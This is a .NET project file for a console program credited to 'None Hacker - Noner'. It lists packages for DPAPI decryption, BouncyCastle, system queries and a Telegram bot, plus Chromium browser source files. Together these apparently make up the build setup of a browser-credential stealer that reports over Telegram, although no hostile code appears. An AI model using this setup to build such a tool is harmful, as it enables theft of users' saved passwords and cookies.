<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <Company>None Hacker - Noner</Company>
    <Product>None</Product>
    <Authors>Noner</Authors>
    <PackageId>Noner</PackageId>
    <Description></Description>
    <Copyright>Hacker » Noner</Copyright>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
    <PlatformTarget>x64</PlatformTarget>
    <PublishAot>True</PublishAot>
  </PropertyGroup>

  <ItemGroup>
    <Compile Remove="Function\Browser.cs" />
    <Compile Remove="Function\Browsers\Chromium.cs" />
  </ItemGroup>

  <ItemGroup>
    <PackageReference Include="Portable.BouncyCastle" Version="1.9.0" />
    <PackageReference Include="System.Drawing.Common" Version="8.0.5" />
    <PackageReference Include="System.Management" Version="8.0.0" />
    <PackageReference Include="System.Security.Cryptography.ProtectedData" Version="8.0.0" />
    <PackageReference Include="Telegram.Bot" Version="19.0.0" />
  </ItemGroup>

  <ItemGroup>
    <Folder Include="Function\Browsers\" />
    <Folder Include="Telegram\" />
  </ItemGroup>

</Project>
